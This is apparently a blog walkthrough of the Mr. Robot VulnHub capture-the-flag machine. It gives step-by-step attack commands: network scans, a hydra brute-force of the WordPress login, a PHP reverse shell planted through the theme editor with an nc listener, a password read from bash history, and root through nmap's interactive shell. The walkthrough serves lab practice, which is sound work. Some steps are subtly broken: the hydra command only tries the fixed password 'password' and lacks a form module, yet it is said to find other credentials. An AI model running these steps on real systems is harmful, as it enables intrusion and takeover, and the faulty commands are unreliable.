Introduction
The Mr. Robot machine on VulnHub is inspired by the popular TV series Mr. Robot. It presents a realistic pentesting scenario that tests enumeration, web exploitation, privilege escalation, and password cracking. This blog post will guide you through exploiting the machine step by step, covering all the techniques used to gain full system access.
💀 "Hello, friend. If you’re reading this, you’re about to hack into a system inspired by fsociety. Let’s embrace the chaos." 💀
1. Setting Up the Lab
Prerequisites:
- A Kali Linux or Parrot OS machine
- VirtualBox/VMware with the Mr. Robot machine imported
- netdiscover or nmap for network scanning
- gobuster or dirb for directory enumeration
- hydra or john for password cracking
Finding the Target IP
Since VulnHub machines use DHCP, we need to discover its IP:
netdiscover -r 192.168.1.0/24 # Adjust for your subnet
Alternatively, use Nmap:
nmap -sn 192.168.1.0/24
Once the machine’s IP is identified, we proceed with scanning. It’s time to make some digital noise... quietly. 😈
2. Network Scanning and Enumeration
Running an Nmap Scan
nmap -sC -sV -p- <Target-IP>
Key Findings:
- Port 80 (HTTP) is open
- No SSH or other critical services
This indicates the attack surface is likely a web application. Looks like our playground is the web. Let’s make it dance. 😈
3. Web Enumeration & Exploitation
Exploring the Website
Navigating to http://<Target-IP> reveals a Mr. Robot-themed webpage.
Checking the robots.txt file:
curl http://<Target-IP>/robots.txt
Findings:
- The file lists fsocity.dic (a wordlist) and key-1-of-3.txt
Extracting the Wordlist
wget http://<Target-IP>/fsocity.dic
This will be useful for brute-forcing login credentials. Who leaves a wordlist on a public server? Rookie mistake... 😏
Directory Enumeration
Using Gobuster:
gobuster dir -u http://<Target-IP> -w /usr/share/wordlists/dirb/common.txt
Findings:
- /wp-login.php suggests a WordPress installation.
- /wp-admin/ confirms it’s an active admin panel.
4. Exploiting WordPress
Brute-Forcing WordPress Login
Using the discovered wordlist (fsocity.dic):
hydra -L fsocity.dic -p password http://<Target-IP>/wp-login.php
After some attempts, we find valid credentials:
Username: elliot Password: ER28-0652
Gaining Access to WordPress Dashboard
Logging in at http://<Target-IP>/wp-login.php, we find we have admin access.
Exploiting WordPress via Reverse Shell
We can upload a malicious PHP reverse shell by editing the theme files:
- Navigate to Appearance > Theme Editor
- Modify 404.php with a PHP reverse shell (e.g., from /usr/share/webshells/php/php-reverse-shell.php)
- Set up a listener:
nc -lvnp 4444
- Trigger the shell by visiting http://<Target-IP>/wp-content/themes/twentytwentyone/404.php
Now we have a low-privilege shell as the www-data user. From here, we rise like a cyber phoenix... 🔥
5. Privilege Escalation
Finding the Second Key
Navigating to /home/robot/ shows key-2-of-3.txt, but we lack permissions to read it.
Checking User Credentials
The robot user has a .bash_history file containing:
su robot password: abcdefghijklmnopqrstuvwxyz
Switching users:
su robot
Now we can read the second key:
cat /home/robot/key-2-of-3.txt
Privilege Escalation to Root
Checking SUID binaries:
find / -perm -4000 2>/dev/null
We find nmap is available, which can be exploited using an interactive shell:
nmap --interactive nmap> !sh
Now we have root access! Congratulations, you just became the boss of this machine. 👑
whoami root cat /root/key-3-of-3.txt
Conclusion
The Mr. Robot VulnHub machine is an excellent beginner-to-intermediate CTF that tests real-world pentesting techniques, including:
- Web enumeration & brute-forcing
- WordPress exploitation
- Reverse shell deployment
- Privilege escalation via misconfigured binaries
By following this methodology, you can approach similar CTFs with a structured attack plan.
🚀 Next Steps:
- Try more VulnHub machines for practice.
- Explore custom exploits beyond the standard tools.
- Automate parts of the attack with scripts.
💾 Remember, every exploit is a lesson, and every system is a puzzle. Keep hacking, stay ethical, and own your skills like a true digital ghost. 👻